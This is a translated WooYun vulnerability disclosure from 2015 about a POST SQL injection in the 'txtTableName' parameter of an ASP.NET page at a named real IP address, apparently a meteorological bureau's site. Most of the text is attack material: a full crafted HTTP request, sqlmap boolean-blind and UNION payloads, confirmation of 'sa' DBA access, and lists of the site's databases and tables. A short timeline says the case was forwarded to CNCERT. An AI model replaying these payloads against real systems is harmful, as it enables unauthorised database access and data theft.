WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles online --------------------------- http://drop.zone.ci/
2015-05-15: Details reported to the vendor; awaiting vendor handling
2015-05-19: Vendor confirmed; details disclosed to the vendor only
2015-05-29: Details disclosed to core white hats and relevant domain experts
2015-06-08: Details disclosed to regular white hats
2015-06-18: Details disclosed to intern white hats
2015-07-03: Details disclosed to the public
A POST-type SQL injection exists, with DBA privileges; I did not have time to look at the details.
URL: http://221.226.82.226:8088/njqxjweb/homepages/comp_query_page.aspx
Injection parameter: txtTableName
POST /njqxjweb/homepages/comp_query_page.aspx HTTP/1.1
Content-Length: 820
Content-Type: application/x-www-form-urlencoded
Cookie: ASP.NET_SessionId=k33dilamx5lw2qz2zc5hlf23; opusr=; duusr=
Host: 221.226.82.226:8088
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

Btn_Post=%e7%82%b9%e5%87%bb&txtCaseName=xbnqkanx&txtShowHtml=1&txtShowText=1&txtSQL=1&txtTableName='%2b(select%20convert(int%2cCHAR(52)%2bCHAR(67)%2bCHAR(117)%2bCHAR(102)%2bCHAR(105)%2bCHAR(100)%2bCHAR(108)%2bCHAR(88)%2bCHAR(104)%2bCHAR(77)%2bCHAR(55))%20FROM%20syscolumns)%2b'&__EVENTARGUMENT=&__EVENTTARGET=&__VIEWSTATE=dDw3NzA3ODMwNDg7dDw7bDxpPDE%2bOz47bDx0PDtsPGk8Mz47aTwxNT47PjtsPHQ8cDxwPGw8VGV4dDs%2bO2w8XGU7Pj47Pjs7Pjt0PEAwPHA8cDxsPENzc0NsYXNzO18hU0I7PjtsPERHX1RhYmxlO2k8Mj47Pj47Pjs7cDxsPENzc0NsYXNzO18hU0I7PjtsPERHX1BhcGVyO2k8Mj47Pj47cDxsPENzc0NsYXNzO18hU0I7PjtsPERHX0hlYWRlcjtpPDI%2bOz4%2bO3A8bDxDc3NDbGFzcztfIVNCOz47bDxER19Gb290ZXI7aTwyPjs%2bPjtwPGw8Q3NzQ2xhc3M7XyFTQjs%2bO2w8REdfSXRlbTtpPDI%2bOz4%2bO3A8bDxDc3NDbGFzcztfIVNCOz47bDxER19BbHRlcjtpPDI%2bOz4%2bOzs7Oz47Oz47Pj47Pj47PieJyssa%2b%2blCTvHYFT%2bsndx1mMD6
Parameter: txtTableName (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: Btn_Post=%e7%82%b9%e5%87%bb&txtCaseName=xbnqkanx&txtShowHtml=1&txtShowText=1&txtSQL=1&txtTableName='+(select convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(102)+CHAR(105)+CHAR(100)+CHAR(108)+CHAR(88)+CHAR(104)+CHAR(77)+CHAR(55))FROM syscolumns)+'' AND 4026=4026 AND 'TfvQ'='TfvQ&__EVENTARGUMENT=&__EVENTTARGET=&__VIEWSTATE=dDw3NzA3ODMwNDg7dDw7bDxpPDE+Oz47bDx0PDtsPGk8Mz47aTwxNT47PjtsPHQ8cDxwPGw8VGV4dDs+O2w8XGU7Pj47Pjs7Pjt0PEAwPHA8cDxsPENzc0NsYXNzO18hU0I7PjtsPERHX1RhYmxlO2k8Mj47Pj47Pjs7cDxsPENzc0NsYXNzO18hU0I7PjtsPERHX1BhcGVyO2k8Mj47Pj47cDxsPENzc0NsYXNzO18hU0I7PjtsPERHX0hlYWRlcjtpPDI+Oz4+O3A8bDxDc3NDbGFzcztfIVNCOz47bDxER19Gb290ZXI7aTwyPjs+PjtwPGw8Q3NzQ2xhc3M7XyFTQjs+O2w8REdfSXRlbTtpPDI+Oz4+O3A8bDxDc3NDbGFzcztfIVNCOz47bDxER19BbHRlcjtpPDI+Oz4+Ozs7Oz47Oz47Pj47Pj47PieJyssa++lCTvHYFT+sndx1mMD6

    Type: UNION query
    Title: Generic UNION query (NULL) - 13 columns
    Payload: Btn_Post=%e7%82%b9%e5%87%bb&txtCaseName=xbnqkanx&txtShowHtml=1&txtShowText=1&txtSQL=1&txtTableName=-2808' UNION ALL SELECT NULL,NULL,NULL,CHAR(113)+CHAR(112)+CHAR(98)+CHAR(106)+CHAR(113)+CHAR(106)+CHAR(87)+CHAR(79)+CHAR(113)+CHAR(111)+CHAR(68)+CHAR(89)+CHAR(81)+CHAR(105)+CHAR(108)+CHAR(113)+CHAR(122)+CHAR(106)+CHAR(112)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &__EVENTARGUMENT=&__EVENTTARGET=&__VIEWSTATE=dDw3NzA3ODMwNDg7dDw7bDxpPDE+Oz47bDx0PDtsPGk8Mz47aTwxNT47PjtsPHQ8cDxwPGw8VGV4dDs+O2w8XGU7Pj47Pjs7Pjt0PEAwPHA8cDxsPENzc0NsYXNzO18hU0I7PjtsPERHX1RhYmxlO2k8Mj47Pj47Pjs7cDxsPENzc0NsYXNzO18hU0I7PjtsPERHX1BhcGVyO2k8Mj47Pj47cDxsPENzc0NsYXNzO18hU0I7PjtsPERHX0hlYWRlcjtpPDI+Oz4+O3A8bDxDc3NDbGFzcztfIVNCOz47bDxER19Gb290ZXI7aTwyPjs+PjtwPGw8Q3NzQ2xhc3M7XyFTQjs+O2w8REdfSXRlbTtpPDI+Oz4+O3A8bDxDc3NDbGFzcztfIVNCOz47bDxER19BbHRlcjtpPDI+Oz4+Ozs7Oz47Oz47Pj47Pj47PieJyssa++lCTvHYFT+sndx1mMD6
---
[14:57:56] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 1.1.4322
back-end DBMS: Microsoft SQL Server 2005
[14:57:56] [INFO] fetching current user
current user: 'sa'
[14:57:56] [INFO] testing if current user is DBA
current user is DBA: True
[14:57:56] [INFO] fetching database names
[14:57:56] [INFO] the SQL query used returns 11 entries
[14:57:56] [INFO] resumed: "master"
[14:57:56] [INFO] resumed: "model"
[14:57:56] [INFO] resumed: "msdb"
[14:57:56] [INFO] resumed: "njqxj"
[14:57:56] [INFO] resumed: "qixiang"
[14:57:56] [INFO] resumed: "qixiang-www"
[14:57:56] [INFO] resumed: "qx2010"
[14:57:56] [INFO] resumed: "ReportServer"
[14:57:56] [INFO] resumed: "ReportServerTempDB"
[14:57:56] [INFO] resumed: "tempdb"
[14:57:56] [INFO] resumed: "weatherforcast"
available databases [11]:
[*] master
[*] model
[*] msdb
[*] njqxj
[*] qixiang
[*] qixiang-www
[*] qx2010
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] weatherforcast
Parameter: txtTableName (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: Btn_Post=%e7%82%b9%e5%87%bb&txtCaseName=xbnqkanx&txtShowHtml=1&txtShowText=1&txtSQL=1&txtTableName='+(select convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(102)+CHAR(105)+CHAR(100)+CHAR(108)+CHAR(88)+CHAR(104)+CHAR(77)+CHAR(55))FROM syscolumns)+'' AND 4026=4026 AND 'TfvQ'='TfvQ&__EVENTARGUMENT=&__EVENTTARGET=&__VIEWSTATE=dDw3NzA3ODMwNDg7dDw7bDxpPDE+Oz47bDx0PDtsPGk8Mz47aTwxNT47PjtsPHQ8cDxwPGw8VGV4dDs+O2w8XGU7Pj47Pjs7Pjt0PEAwPHA8cDxsPENzc0NsYXNzO18hU0I7PjtsPERHX1RhYmxlO2k8Mj47Pj47Pjs7cDxsPENzc0NsYXNzO18hU0I7PjtsPERHX1BhcGVyO2k8Mj47Pj47cDxsPENzc0NsYXNzO18hU0I7PjtsPERHX0hlYWRlcjtpPDI+Oz4+O3A8bDxDc3NDbGFzcztfIVNCOz47bDxER19Gb290ZXI7aTwyPjs+PjtwPGw8Q3NzQ2xhc3M7XyFTQjs+O2w8REdfSXRlbTtpPDI+Oz4+O3A8bDxDc3NDbGFzcztfIVNCOz47bDxER19BbHRlcjtpPDI+Oz4+Ozs7Oz47Oz47Pj47Pj47PieJyssa++lCTvHYFT+sndx1mMD6

    Type: UNION query
    Title: Generic UNION query (NULL) - 13 columns
    Payload: Btn_Post=%e7%82%b9%e5%87%bb&txtCaseName=xbnqkanx&txtShowHtml=1&txtShowText=1&txtSQL=1&txtTableName=-2808' UNION ALL SELECT NULL,NULL,NULL,CHAR(113)+CHAR(112)+CHAR(98)+CHAR(106)+CHAR(113)+CHAR(106)+CHAR(87)+CHAR(79)+CHAR(113)+CHAR(111)+CHAR(68)+CHAR(89)+CHAR(81)+CHAR(105)+CHAR(108)+CHAR(113)+CHAR(122)+CHAR(106)+CHAR(112)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &__EVENTARGUMENT=&__EVENTTARGET=&__VIEWSTATE=dDw3NzA3ODMwNDg7dDw7bDxpPDE+Oz47bDx0PDtsPGk8Mz47aTwxNT47PjtsPHQ8cDxwPGw8VGV4dDs+O2w8XGU7Pj47Pjs7Pjt0PEAwPHA8cDxsPENzc0NsYXNzO18hU0I7PjtsPERHX1RhYmxlO2k8Mj47Pj47Pjs7cDxsPENzc0NsYXNzO18hU0I7PjtsPERHX1BhcGVyO2k8Mj47Pj47cDxsPENzc0NsYXNzO18hU0I7PjtsPERHX0hlYWRlcjtpPDI+Oz4+O3A8bDxDc3NDbGFzcztfIVNCOz47bDxER19Gb290ZXI7aTwyPjs+PjtwPGw8Q3NzQ2xhc3M7XyFTQjs+O2w8REdfSXRlbTtpPDI+Oz4+O3A8bDxDc3NDbGFzcztfIVNCOz47bDxER19BbHRlcjtpPDI+Oz4+Ozs7Oz47Oz47Pj47Pj47PieJyssa++lCTvHYFT+sndx1mMD6
---
[14:59:28] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 1.1.4322
back-end DBMS: Microsoft SQL Server 2005
[14:59:28] [INFO] fetching tables for database: [qixiang-www]
[14:59:28] [INFO] the SQL query used returns 56 entries
Database: qixiang-www
[56 tables]
+---------------------------+
| Attachfile                |
| Category                  |
| CategoryValue             |
| ColsRemark                |
| ConfigRow                 |
| Dept                      |
| DisserManage              |
| EffectDate                |
| ImportDocuments           |
| JobBase                   |
| JobdelayInfo              |
| OperateLog                |
| TableQueryCondition       |
| TablesBasicDebug          |
| TablesRemark              |
| TailorFormCol             |
| TailorFormCol             |
| TempWebusercase           |
| Usr                       |
| WebAttachfile             |
| WebResource               |
| WebUserFromOA             |
| balloonreleasespots       |
| caseballoonqualify        |
| caseballoonqualify        |
| casebaseprocedure         |
| casebaseprocedure         |
| caseimportdocList         |
| caseimportdocList         |
| caseinstanceimportdoclist |
| caseinstanceimportdoclist |
| caseresultselected        |
| dataListColumn            |
| dataListDefine            |
| dtproperties              |
| guestProctrans            |
| jobRelation               |
| lightningproofbuilding    |
| lightningproofdesign      |
| lightningprooffinish      |
| othercasebase             |
| powercode                 |
| procform                  |
| procguide                 |
| punishdisclose            |
| sqdwb                     |
| sqrb                      |
| tableTrigger              |
| webcaseinstanceimportdoc  |
| webusercase               |
| webusercase               |
| workflowchart             |
| workflowchart             |
| workflowform              |
| workflownext              |
| workstep                  |
+---------------------------+
Everyone knows.
Severity: Medium
Vulnerability Rank: 10
Confirmed: 2015-05-19 17:33
CNVD did not directly reproduce the described situation; the case has been forwarded via CNCERT to the Jiangsu branch center, which will coordinate handling with the website's operating organization.
None yet.